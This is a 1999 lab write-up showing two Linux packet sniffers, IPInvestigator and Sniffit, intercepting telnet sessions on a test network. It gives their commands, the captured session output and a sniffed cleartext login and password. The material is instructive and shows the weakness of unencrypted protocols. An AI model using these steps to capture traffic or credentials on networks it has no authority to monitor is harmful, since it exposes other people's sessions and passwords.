Experimenting with Linux ethernet sniffers

IPInvestigator 1.1, Sniffit.0.3.5

Last updated: 21th of March 1999.

The vulnerability was analyzed by:
Johannes Kleimola, Johannes.Kleimola@hut.fi


IPInvestigator 1.1

Version 1.1 - Written by, Jeff Thompson

IPInvestigator consists of two separate programs List and Watch. With the first one you can listen (take a snapshot, not real-time) for current connections on the net and have it printed on stdout with IP-addresses and ports. Let's take a look.

[root@parittaja IPI]# ./List eth0 10
Up and running. Collect them NFO'Z
0: src:10.0.0.81 22 dst:10.0.0.254 1019
1: src:10.0.0.91 23 dst:10.0.0.81 26241
2: src:10.0.0.81 26241 dst:10.0.0.91 23
3: src:10.0.0.254 1019 dst:10.0.0.81 22
4: src:10.0.0.254 1020 dst:10.0.0.61 22
5: src:10.0.0.61 22 dst:10.0.0.254 1020
Found 6 unique connections.
[root@parittaja IPI]#
As can be seen, there are a couple of ssh-connections (port 22) and one telnet-connection (port 23) going. Since ssh is crypted, we are only interested in the later one. Witch Watch you can pick one of the connections (by specifying source ip, dest ip, source port and dest port in that order and without the dots) and watch it real-time printed on stdout. I'll pick the server-to-host direction, so we'll see everything what's happening.
[root@parittaja IPI]# ./Watch eth0 10 0 0 91 10 0 0 81 23 26241
Up and running. Collect them NFO'Z
ls^M^M
files       letter.txt  mail^M^M
# ls -al^M^M
total 10^M^M
drwxr-xr-x   4 1017     other        512 Mar 20 01:41 .^M^M
drwxr-xr-x  29 root     other        512 Mar 16 21:20 ..^M^M
drwxr-xr-x   2 root     other        512 Mar 20 01:26 files^M^M
-rw-r--r--   1 root     other         78 Mar 20 01:41 letter.txt^M^M
drwxr-xr-x   2 root     other        512 Mar 20 01:25 mail^M^M
# ps^M^M
   PID TTY      TIME CMD^M^M
 16442 pts/1    0:00 ps^M^M
  1600 pts/1    0:01 sh^M^M
# cd ..^M^M
# pwd^M^M
/home2^M^M
# telnet rikas^M^M
rikas: Unknown host^M^M
# telnet 10.0.0.81^M^M
Trying 10.0.0.81...^M^M
Connected to 10.0.0.81.^M^M
Escape character is '^]'.^M^M
^M^M
Red Hat Linux release 5.2 (Apollo)^M^M
Kernel 2.0.36 on an i686^M^M
login: jj^M^M
Password: ^M^M
Last login: Sat Mar 20 01:47:04 from localhost^M^M
[jj@rikas ~]$ exit^M
logout^M^M
Connection closed by foreign host.^M^M
#
[root@parittaja IPI]#
This time we saw everything the user did, but not his password (it is not echoed back to the user). For the password we would have had to pick the client-to-server direction of the telnet connection.

IPInvestigator compiles fine on an old RedHat4.2 (libc5), but requires changes to compile on newer systems.

Sniffit.0.3.5

by Brecht Claerhout

Sniffit is one the most famous and best ethernet sniffers for Linux. You can run it either on the command line (several configuration options with optional filters and plug-ins) or in interactive mode. Below is a short telnet-session we'll track later with sniffit.

# telnet 10.0.0.81
Trying 10.0.0.81...
Connected to 10.0.0.81.
Escape character is '^]'.

Red Hat Linux release 5.2 (Apollo)
Kernel 2.0.36 on an i686
login: jj
Password:
Last login: Sun Mar 21 22:01:34 from rakas
[jj@rikas ~]$ ls -al^M^M
total 14
drwx------   4 jj       jj           1024 Mar 21 21:56 .
drwxr-xr-x  37 root     root         1024 Mar 20 02:27 ..
-rw-------   1 jj       jj            210 Mar 20 01:47 .Xauthority
-rw-r--r--   1 jj       jj           1155 Mar 17 20:46 .Xdefaults
-rw-------   1 jj       jj           2918 Mar 20 01:51 .bash_history
-rw-r--r--   1 jj       jj             24 Mar 17 20:46 .bash_logout
-rw-r--r--   1 jj       jj            230 Mar 17 20:46 .bash_profile
-rw-r--r--   1 jj       jj            124 Mar 17 20:46 .bashrc
drwxr-xr-x   2 jj       jj           1024 Mar 18 00:43 .ssh
-rw-rw-r--   1 jj       jj            121 Mar 21 21:57 dead.letter
drwxrwxr-x   2 jj       jj           1024 Mar 21 21:56 mail
[jj@rikas ~]$ exit^M^M
logout
Connection closed by foreign host.
#

The interactive (mode) sniffit would give you a nice ncurses window with some configuration options. Those are stripped from the outputs below. The sniffit window shows ongoing real-time connections and you can select one for interactive logging with up-down-arrows and pressing enter. Here's an example of ongoing connections and we'll pick a telnet session again.
        10.0.0.61    22  ->        10.0.0.81  1021
        10.0.0.81    22  ->       10.0.0.254  1019
       10.0.0.254  1022  ->        10.0.0.81    22
        10.0.0.81  1023  ->        10.0.0.91   513
        10.0.0.91 34483  ->        10.0.0.81    23           *LOGGED*
        10.0.0.81    23  ->        10.0.0.91 34483
        10.0.0.91   513  ->        10.0.0.81  1023
        10.0.0.81    22  ->       10.0.0.254  1022
       10.0.0.254  1019  ->        10.0.0.81    22
        10.0.0.81  1021  ->        10.0.0.61    22
Logging a connection gives you a real-time view showing every printable character. This time I picked the client-to-server direction, so we only see what the user typed. But that gives us what we want: the username and the password (two first 'words').
jj..t00s1mple..ls -al..exit

 10.0.0.91 34483  ->        10.0.0.81    23
Even though the interactive mode is good for getting an overwiev of the connections and maybe for administrative monitoring, the real strength of sniffit is in it's command-line controls/logging. You can specify what is logged and how and even use filters (configuration files) and plug-ins for filtering/printing (a nice dns-plugin follows with sniffit).

Sniffit compiles fine on both RedHat4.2 (libc5) and Redhat5.2 (glibc2).